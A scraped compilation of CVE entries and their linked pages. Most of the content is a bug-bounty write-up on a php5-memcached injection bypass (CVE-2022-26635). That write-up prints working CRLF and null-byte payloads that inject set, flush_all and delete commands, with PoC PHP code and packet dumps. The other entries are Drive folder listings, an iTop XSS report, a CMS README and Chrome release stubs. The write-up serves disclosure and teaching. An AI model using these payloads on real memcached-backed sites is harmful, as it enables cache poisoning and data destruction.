jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

CVE-2022-28796

An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.

Drive

Logga in

Drive

Namn

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

after\_exploitation.png

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

before\_exploitation.png

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

exploitation\_request.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

exploitation.png

![](https://ssl.gstatic.com/docs/doclist/images/empty_state_empty_folder.png)

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46419: Telesquare TLR-2855KS6 – Google Drive

An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.

Drive

Logga in

Drive

Namn

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

exploitation\_request.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

exploitation.png

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

result.png

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46418: TLR-2855KS6 – Google Drive

Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.

Drive

Logga in

Drive

Namn

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

Credits & Info.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

exploitation.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

PoC.png

![](https://ssl.gstatic.com/docs/doclist/images/empty_state_empty_folder.png)

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46417: FFS Colibri – Google Drive

Insecure direct object reference in SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R leads to unauthorized user groups accessing due to insecure cookie handling.

Drive

Logga in

Drive

Namn

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

After\_Exploitation.png

![](https://drive-thirdparty.googleusercontent.com/128/type/image/png)

![Image](https://drive-thirdparty.googleusercontent.com/16/type/image/png)

Before\_Exploit.png

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

Credits & Info.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/text/plain)

![Text](https://drive-thirdparty.googleusercontent.com/16/type/text/plain)

exploitation.txt

![](https://drive-thirdparty.googleusercontent.com/128/type/video/mp4)

![Video](https://drive-thirdparty.googleusercontent.com/16/type/video/mp4)

PoC.mp4

![](https://ssl.gstatic.com/docs/doclist/images/empty_state_empty_folder.png)

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46416: SMA – Google Drive

Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.

Valid

Reported on

Jun 30th 2021

**💥 BUG**

stored xss via file upload

**💥 STEP TO REPRODUCE**

here in this case i uploaded a html file with xss payload inside.  
Plz check this 1 minute video to reproduce https://drive.google.com/file/d/1xKqYFgrsFUfp9Ufe4XiATQcAL-Q6Mr9G/view?usp=sharing

**💥 Impact**

I see there is many different type of role base user . So, user who has permission to upload document can make xss attack against higher level user or admin

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

CVE-2022-24811: Cross-site Scripting (XSS) - Stored in itop

PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.

**Php5-memcached Injection Bypass**

Date published:

6-Mar-2022

PHP

Injection

**TL;DR:** A bypass of php5-memcached <= v2.2.0 space \\x20 filtering, using a null byte injection along-side with CRLF before the injected command as the following: **\\0\\r\\nset xhzeem 0 100 3\\r\\npoc**.

Hi everyone, hope you are having a great day, this is a new write-up I'm writing about a bypass I found to inject commands to the Memcached server from the php-memchached library.

While testing a private bug bounty program on HackerOne I was looking into the javascript files and I came across this code.

function e(e) {

    return n.token && !e || (n.token \= i.get("/billing/token.json"),

    setTimeout(function() {

        delete n.token

    }, 18e4)),

    n.token

}

function s(e) {

    return a + "/billing/cart.php?" + $.param(e)

}

I tried to check the endpoint for the token and it returned back a JSON token in the format `{"token":"<KEY>"}`. Then I tested the other endpoint with the token I got, and the page loads with a valid token or returns an error when the token is invalid.

So I tested for typical SQL injections, with `'`, `"`, `\`, and other blind payloads, but none worked until I tried a null byte `\x00` which was interesting.

The null byte caused the string to end, and only the part before was validated, so `[VALID-TOKEN]%00xhzeem` is the same as `[VALID-TOKEN]`

I checked again with other characters and found which seemed like a DoS when I add `\n`\=`%0A` character, at the end (only). The server will take one minute to respond with:

<html\>

    <head\>

        <title\>504 Gateway Time-out</title\>

    </head\>

    ...

</html\>

I didn't know what to do next and I had no clue about the source code, so I decided to report and ask the team for help, as I have a good relationship with them and they are really supportive.

I asked the team to check if the payload is being passed into an SQL query or something that can explain this behavior.

Their response was that no database is being used, but the command is being passed into a memcached server and they gave me this code:

<?php

  $server \= new \\Memcached();

  $server\-\>addServer('localhost', 11211);

  $server\-\>get("$\_GET\['token'\]");

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering.link

While php-memcached is a PHP library to communicate with the Memcached server with some methods, these methods are our target to exploit.link

To understand it simply we set up the server and connect to it with simple commands such as (`get`, `set`) to store values and retrieve them.

➜ xhzeem $ telnet localhost 11211⏎

Trying ::1...

Connected to localhost.

Escape character is '^\]'.

set xhzeem 0 100 4⏎

anas⏎

STORED

get xhzeem⏎

VALUE xhzeem 0 4

anas

END

delete xhzeem⏎

DELETED

version⏎

VERSION 1.6.14

get xhzeem⏎

END

Here we set "xhzeem =\> anas" and get that value, then we delete the value and check for the Memcached server version, then we ask again for xhzeem's value but we already deleted it, so we get END, which means note found. (Note that `⏎` means enter given as input, and after it comes to the server response)

After they gave me this I started researching, so I googled for any known exploitations for a Memcached injection case, and I came across this Black Hat Paper

from the paper, I see that the php-memcached uses the binary protocol and it accepts `\x00`,`\x20`,`\x0D`, `\x0A`, and in this case, the payload should be as simple as `TOKEN\r\nset xhzeem 0 100 3\r\npoc` to inject a new key in the server, but when I crafted the payload the team told me that they see no `xhzeem` key in the server and the payload doesn't seem to be injectable.

https://SITE.COM/billing/cart.php?token\=token%0D%0Aset%20xhzeem%200%20300%203%0D%0Apoc

**Local Testing**

Here I started deploying a version to test it locally and see if I have a chance with this injection, and in my local testing with `[email protected]` (which was a pain setting it up on my mac) and it was using a normal text protocol, the null byte didn't end the string (and ignore the rest), nor did the newline cause any sort of server delay.

I thought it had to be an older version and started looking for some way to test older versions with docker or something and I can through this gist which was helpful, and after setting it up I used the following PHP code to test manually and started intercepting the traffic with Wireshark.

<?php

$server \= new \\Memcached();

$server\-\>addServer('host.docker.internal', 11211);

$token \= $\_GET\['token'\];

$server\-\>set("anas","poc") ;

echo "\[token\] = ";

var\_dump($server\-\>get("$token")); 

echo "\[anas\] = ";

var\_dump($server\-\>get("anas"));

I tried `%00` and `%0A`, thankfully I got the same behavior I experienced with the application, so I knew I was on track (the team confirmed to me the version they are using). Here I tried to check from the network traffic what exactly is going.

The version is **2.2.0**

**Test Cases**

**Payload #1:** `xhzeem`

> \[token\] = bool(false)   \[anas\] = string(3) "poc"

**Payload #2:** `xhzeem%0D%0Aanything`

> \[token\] = bool(false)   \[anas\] = string(3) "poc"

**Payload #3:** `xhzeem%0D%0Aflush_all` (flush\_all) is a command to clear all key-value pairs.

> \[token\] = string(0) ""   \[anas\] = bool(false)

**Payload #4:** `xhzeem%0D%0Aset%20xhzeem%200%20300%203%0D%0Ainj` (setting xhzeem=inj)

> \[token\] = bool(false)   \[anas\] = string(3) "poc"

As you can see in the third case we executed the `flush_all` command, and `anas` is not found anymore.

checking the network traffic and this was the hex dump for the third payload

0000   02 00 00 00 45 00 00 4a 00 00 40 00 40 06 00 00 | . . . . . . . .  . . . . . . . .

0010   7f 00 00 01 7f 00 00 01 d4 9f 2b cb 24 58 2a 0e | . . . . . . . .  . . . . . . . .

0020   15 fe e9 0a 80 18 18 eb fe 3e 00 00 01 01 08 0a | . . . . . . . .  . . . . . . . .

0030   8f 8d 5a 56 fa e7 81 4c 67 65 74 20 78 68 7a 65 | . . . . . . . .  g e t . x h z e

0040   65 6d 0d 0a 66 6c 75 73 68 5f 61 6c 6c 0d 0a    | e m . . f l u s  h \_ a l l . .

![](https://xhzeem.me/static/af21561fcd28741365655bd036730043/73f08/1.png)

The problem is that whenever I try to insert a new key with the set command as our 4th payload (the one we tried as a PoC before but the team said they found no xhzeem key in the server), the payload is never sent to the Memcached server... while `flush_all` is sent and executed.

Finally, after a lot of debugging I found that the space `\x20` character is filtered and will block the request from being sent if it was passed to the PHP method (`Memcached::get()`, `Memcached::set()`, etc..), but to injection commands like set we need the format:

set <key\> <flags\> <time\> <length\>⏎

<value\>

Moreover, Memcached has no alternatives to `\x20`, so it doesn't recognize `\x09` or anything else.

I updated the report with a PHP PoC for the team to test locally, because I didn't want to try flush\_all remotely on their production website, and I told them to test if it works (the third `get` has to return an empty string), they can confirm the there is an injection vulnerability on the server.

<?php

$server \= new \\Memcached();

$server\-\>addServer('localhost', 11211);

var\_dump($server\-\>get("xhzeem"));

var\_dump($server\-\>get("xhzeem\\r\\nanything"));

var\_dump($server\-\>get("xhzeem\\r\\nversion"));

If the page returned the following, there is an injection, because by default, there should be no `xhzeem` key, but the last get method is confused with the version returned and accepts it as it was a valid key with an empty value.

> bool(false)   bool(false)   string(0) ""

Meanwhile, I was doing some more testing and fuzzing, until I finally found the payload to bypass this space restriction issue, and it was by pretending the payload with a null byte, and the payload will be accepted!

**PoC**

TOKEN%00%0D%0Aset%20xhzeem%200%20100%203%0D%0Apoc

To the application the payload will be injected as the following:

<?php

  $server \= new \\Memcached();

  $server\-\>addServer('localhost', 11211);

  $server\-\>get("TOKEN\\0\\r\\nset xhzeem 0 100 3\\r\\npoc");

And what `get` method does, is that it sends a Memcache reqeust with the value we entered, so instead of a simple one-line (intended) call `get TOKEN`, it will be as the following, and were are able to inject any command into the Memcached server!

0000   02 00 00 00 45 00 00 57 00 00 40 00 40 06 00 00 | . . . . . . . .  . . . . . . . .

0010   7f 00 00 01 7f 00 00 01 e9 b0 2b cb c3 3a 6c 71 | . . . . . . . .  . . . . . . . .

0020   2b ad f5 d8 80 18 18 eb fe 4b 00 00 01 01 08 0a | . . . . . . . .  . . . . . . . .

0030   90 31 11 5d e2 5b 68 29 67 65 74 20 54 4f 4b 45 | . . . . . . . .  g e t . T O K E

0040   4e 00 0a 73 65 74 20 78 68 7a 65 65 6d 20 30 20 | N . . s e t . x  h z e e m . 0 .

0050   31 30 30 20 33 20 70 6f 63 0d 0a                | 1 0 0 . 3 . p o  c . .

![](https://xhzeem.me/static/c6f06b950a0b0406229bd1ba6b0deb28/73f08/2.png)

The team's fix was as the following (they had to test the `flush_all` unfortunately haha)

> Hi, The fix is: `preg_replace('/\s+/m', '', mb_substr($key, 0, 250))` for any Memcache request. I've tested with `flush_all` and got clean Memcached storage :) Currently, I'm sure it doesn't work

While this bug is hard to be detected and exploited in black box penetration testing. The best way to test blindly is to clear the whole Memcached memory with the `flush_all` command which is something I don't recommend trying `xhzeem%0D%0Aflush_all`.

For now, I think the best shot to try when we have such a behavior (null bytes and newlines) is to test `xhzeem%0D%0Aversion` and see if the behavior differs by any way from invalid commands other than `version`, if so, we can say it's worth reporting.

In other cases we can try to delete the key from the server for example with `xhzeem%0D%0Adelete%20[MY-TOKEN]`, and now the token should be invalid, but we don't know if the token is appended with anything, so we cannot guarantee this method to work.

(If anyone has a better way to test, please share with me, and will update here with his name)

Hope all security teams were that cooperative with researchers, it will be in their products' benefit in the first place.

Thanks for reading the write-up... if you have any questions can ask anytime on Twitter ;)

CVE-2022-26635: xhzeem | Php5-memcached Injection Bypass

File upload vulnerability in HorizontCMS before 1.0.0-beta.3 via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE.

![](https://github.com/ttimot24/HorizontCMS/raw/master/resources/logo.png)

**HorizontCMS**

![Laravel 6](https://camo.githubusercontent.com/314491d844e18f3b99c208e3cc91663cc14bbdd442512b973cbff1d24e462795/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c61726176656c2d382d6f72616e67652e737667) ![Build Status](https://camo.githubusercontent.com/b7bb914013435dafc0f5de1cab69881021e214d77fa41fb5e159fd4289618607/68747470733a2f2f7472617669732d63692e636f6d2f7474696d6f7432342f486f72697a6f6e74434d532e7376673f6272616e63683d6d6173746572) ![Github All Releases](https://camo.githubusercontent.com/9546649a265ca1a3e595d64a28313c8ae009846964cebda439d8668127aa4616/68747470733a2f2f696d672e736869656c64732e696f2f6769746875622f646f776e6c6f6164732f7474696d6f7432342f686f72697a6f6e74636d732f746f74616c2e737667) ![Codacy Badge](https://camo.githubusercontent.com/811f5fc816e57b1d445ccedf48338d808995ccb645917dd0e825488b096cb294/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f47726164652f6436343562366265396236613432613862363138396363333265613866353436) ![Codacy Badge](https://camo.githubusercontent.com/7dac42d80c03c5885b504fc24d712b4edb4575c8683be88f6330d829e42913e2/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f436f7665726167652f6436343562366265396236613432613862363138396363333265613866353436)

HorizontCMS is an open-source, responsive Content Management System (CMS) built on Laravel 8, VueJs 2.6 and Bootstrap 5.1 which you can use to build you next generation websites and blogs.

This lightweight CMS platform provides end-users with the tools to extend and build sustainable web presence with one click which makes it easy to learn for users, simple to code for developers

**Latest version: v1.0.0-beta.2****Try out**

Frontend: http://horizontcms.herokuapp.com/

Backend: http://horizontcms.herokuapp.com/admin

> Username & password: admin/admin

**Installation****Browser**

After downloading and copying the files to the server, navigate to the app root folder and run `composer install`. Then head to your domain. HorizontCMS can recognize if not installed yet, and redirects you to the installer. Follow the instructions, add the required credentials and you're done.

**Console**

1.  Download the CMS
2.  Navigate to the app root folder and run `composer install`
3.  Run `php artisan horizontcms:install`
4.  Enter the required database and administrator informations.
5.  You're finished.

**Migration information**

Incremented migrations will be in use after v1.0 is released. Until then migration files might be modified.

**Install manually from scratch**

Website For Students Tutorial

**Docker Image**

https://hub.docker.com/repository/docker/ttimot24/horizont-cms

**Sample plugin**

GoogleMaps

**Contributing**

*   Create a Theme or Plugin
*   Create translation
*   Help in the docs.
*   Write tests
*   Report issues, send pull requests
*   Tell what you think!

Any help is appreciated!

**Donation**

If this project makes your website development easier, you can buy me a coffe. :)

![paypal](https://camo.githubusercontent.com/361950b331ef676b7eec436a4dbe5a7ce47211a6623dcc889b1f5b7b611b27df/68747470733a2f2f7777772e70617970616c6f626a656374732e636f6d2f656e5f55532f692f62746e2f62746e5f646f6e61746543435f4c472e676966)

Project by Timot Tarjani (@ttimot24)

CVE-2021-28428: GitHub - ttimot24/HorizontCMS: Lightweight CMS built on Laravel 8, VueJs 2.6 and Bootstrap 5.1. An alternative platform to OctoberCMS

Heap buffer overflow in Cast UI in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page.

**Chrome Releases**

Release updates from the Chrome team

CVE-2022-0800: Stable Channel Update for Desktop

Out of bounds memory access in WebXR in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Tag

#google